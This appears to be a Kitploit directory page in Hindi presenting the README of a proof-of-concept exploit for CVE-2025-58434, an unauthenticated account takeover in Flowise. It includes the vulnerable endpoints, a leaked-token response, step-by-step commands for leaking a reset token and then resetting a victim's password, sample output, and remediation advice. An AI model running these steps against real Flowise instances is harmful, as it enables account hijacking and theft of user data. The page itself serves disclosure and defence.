Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434-poc — CVE-2025-58434 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो लीक हुए पासवर्ड रीसेट टोकन के माध्यम से Flowise में अनऑथेंटिकेटेड अकाउंट टेकओवर प्रदर्शित करता है। इसमें दो-चरणीय हमला शामिल है: टोकन लीक और पासवर्ड रीसेट। | Kitploit
उपकरण/GitHubGitHub/kartik2005221/cve-2025-58434-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारेड टीमिंग
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

CVE-2025-58434 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो लीक हुए पासवर्ड रीसेट टोकन के माध्यम से Flowise में अनऑथेंटिकेटेड अकाउंट टेकओवर प्रदर्शित करता है। इसमें दो-चरणीय हमला शामिल है: टोकन लीक और पासवर्ड रीसेट।

रिपॉजिटरी देखें
1465 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-58434 — Flowise खाता अधिग्रहण टोकन प्रकटीकरण के माध्यम से

CVE CVSS Python License Disclosure

⚠️ यह रिपॉजिटरी केवल शैक्षिक एवं अधिकृत सुरक्षा अनुसंधान के लिए है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, गैरकानूनी है।


विषय सूची

  • अवलोकन
  • भेद्यता विवरण
  • आक्रमण प्रवाह
  • प्रभावित संस्करण
  • रिपॉजिटरी संरचना
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • उदाहरण आउटपुट
  • उपचार
  • प्रकटीकरण समयरेखा
  • संदर्भ
  • अस्वीकरण

अवलोकन

Flowise (क्लाउड-होस्टेड एवं सेल्फ-होस्टेड दोनों) में forgot-password एंडपॉइंट एक वैध पासवर्ड रीसेट टोकन (tempToken) सीधे HTTP प्रतिक्रिया बॉडी में लौटाता है — बिना किसी ईमेल सत्यापन या प्रमाणीकरण के।

इसका मतलब है कि एक हमलावर जो पीड़ित के ईमेल पते को जानता है (या अनुमान लगा सकता है):

  1. forgot-password एंडपॉइंट को कॉल करे → JSON प्रतिक्रिया में tempToken प्राप्त करे
  2. reset-password को कॉल करने के लिए tempToken का उपयोग करे → एक नया पासवर्ड सेट करे
  3. पीड़ित के रूप में लॉग इन करे → पूर्ण खाता अधिग्रहण (ATO)

कोई पूर्व पहुंच, कोई उपयोगकर्ता सहभागिता और कोई ईमेल पहुंच आवश्यक नहीं है।


भेद्यता विवरण

फ़ील्डमान
CVE IDCVE-2025-58434
CVSS स्कोर9.8 (गंभीर)
CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-640: कमज़ोर पासवर्ड पुनर्प्राप्ति तंत्र
प्रकारप्रमाणीकरण बाईपास / असुरक्षित प्रत्यक्ष वस्तु एक्सपोज़र
प्रभावित ऐपFlowise (क्लाउड + सेल्फ-होस्टेड)
एंडपॉइंट 1POST /api/v1/account/forgot-password
एंडपॉइंट 2POST /api/v1/account/reset-password

मूल कारण

forgot-password हैंडलर संपूर्ण उपयोगकर्ता रिकॉर्ड — जिसमें उत्पन्न tempToken शामिल है — सीधे API प्रतिक्रिया में लौटाता है, इसके बजाय कि इसे केवल उपयोगकर्ता के पंजीकृत ईमेल पते पर भेजा जाए।

{
  "user": {
    "id": "<uuid>",
    "name": "Victim Name",
    "email": "[email protected]",
    "credential": "<bcrypt-hash>",
    "tempToken": "<LEAKED_TOKEN_HERE>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

आक्रमण प्रवाह

हमलावर                              Flowise API
   │                                       │
   │  POST /forgot-password {ईमेल}        │
   │──────────────────────────────────────►│
   │                                       │  (tempToken उत्पन्न करता है)
   │◄──────────────────────────────────────│
   │  201 { tempToken: "abc123..." }       │
   │                                       │
   │  POST /reset-password {ईमेल,         │
   │         tempToken, नया पासवर्ड}       │
   │──────────────────────────────────────►│
   │                                       │
   │◄──────────────────────────────────────│
   │  200 OK  (पासवर्ड बदल दिया गया!)     │
   │                                       │
   ✓  खाता अधिग्रहण पूर्ण

प्रभावित संस्करण

  • Flowise क्लाउड (cloud.flowiseai.com) — प्रभावित होने की पुष्टि
  • पैच से पहले सभी सेल्फ-होस्टेड Flowise तैनातियाँ

पैच की गई रिलीज़ जानकारी के लिए आधिकारिक Flowise GitHub देखें।


रिपॉजिटरी संरचना

CVE-2025-58434/
├── cve_2025_58434_poc.py   # मुख्य PoC स्क्रिप्ट (दो-चरणीय ATO)
├── requirements.txt         # Python निर्भरताएँ
├── README.md                # यह फ़ाइल
└── DISCLAIMER.md            # कानूनी सूचना (उपयोग से पहले पढ़ें)

आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • requests लाइब्रेरी

स्थापना

# रिपॉजिटरी क्लोन करें
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

उपयोग

सहायता स्क्रीन

python3 cve_2025_58434_poc.py --help

चरण 1 — टोकन लीक करें (टोही)

इंस्टेंस भेद्य है या नहीं इसकी पुष्टि करें और बिना कोई पासवर्ड रीसेट किए tempToken प्राप्त करें।

python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected]

चरण 2 — पूर्ण खाता अधिग्रहण

लीक किए गए टोकन का उपयोग करके तुरंत पासवर्ड रीसेट करें।

python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --reset \
  --new-password "MyNewP@ss2025!"

कच्चा JSON प्रतिक्रिया डंप करें

python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --json-output

सभी विकल्प

ध्वजसंक्षिप्तविवरणडिफ़ॉल्ट
--url URL-uFlowise इंस्टेंस का आधार URL(आवश्यक)
--email EMAIL-eलक्ष्य खाते का ईमेल पता(आवश्यक)
--reset-rचरण 2 करें: लीक किए गए टोकन से पासवर्ड रीसेट करेंFalse
--new-password PASS-pसेट करने के लिए नया पासवर्ड (--reset के साथ उपयोग करें)Changeme@2025!
--timeout SECONDS-tHTTP अनुरोध टाइमआउट10
--json-output-jकच्चा JSON API प्रतिक्रिया stdout पर प्रिंट करेंFalse

उदाहरण आउटपुट

  [Step 1] Sending forgot-password request …
  [*] HTTP Status : 201

  ========================================================================
    LEAKED ACCOUNT DATA
  ========================================================================
    User ID       : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
    Name          : Admin User
    Email         : [email protected]
    Credential    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Status        : active
    tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
    tokenExpiry   : 2025-08-19T13:00:33.834Z
  ========================================================================

  [+] tempToken obtained  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  [!] VULNERABLE: The instance leaks password reset tokens unauthenticated!

उपचार

यदि आप Flowise इंस्टेंस संचालक हैं, तो तुरंत निम्नलिखित शमन लागू करें:

  1. कभी भी API प्रतिक्रियाओं में रीसेट टोकन वापस न करें। टोकन विशेष रूप से पंजीकृत ईमेल पते पर भेजें।
  2. forgot-password से एक सामान्य सफलता संदेश लौटाएं भले ही ईमेल मौजूद हो या न हो — इससे खाता गणना भी रुकती है।
  3. टोकन बाधाएँ लागू करें:
    • एकल-उपयोग (पहले उपयोग के बाद अमान्य करें)
    • छोटी समाप्ति (जैसे 15 मिनट)
    • जहाँ संभव हो, अनुरोध करने वाले IP / User-Agent से बंधा
  4. सभी तैनाती मॉडलों में सुधार लागू करें — क्लाउड और सेल्फ-होस्टेड दोनों।
  5. forgot-password एंडपॉइंट पर दर सीमा लागू करें।
  6. असामान्य पासवर्ड रीसेट गतिविधि पर लॉग और सतर्क करें।
  7. प्रशासक और उच्च-विशेषाधिकार खातों के लिए MFA पर विचार करें।

प्रकटीकरण समयरेखा

टूल डाउनलोड करें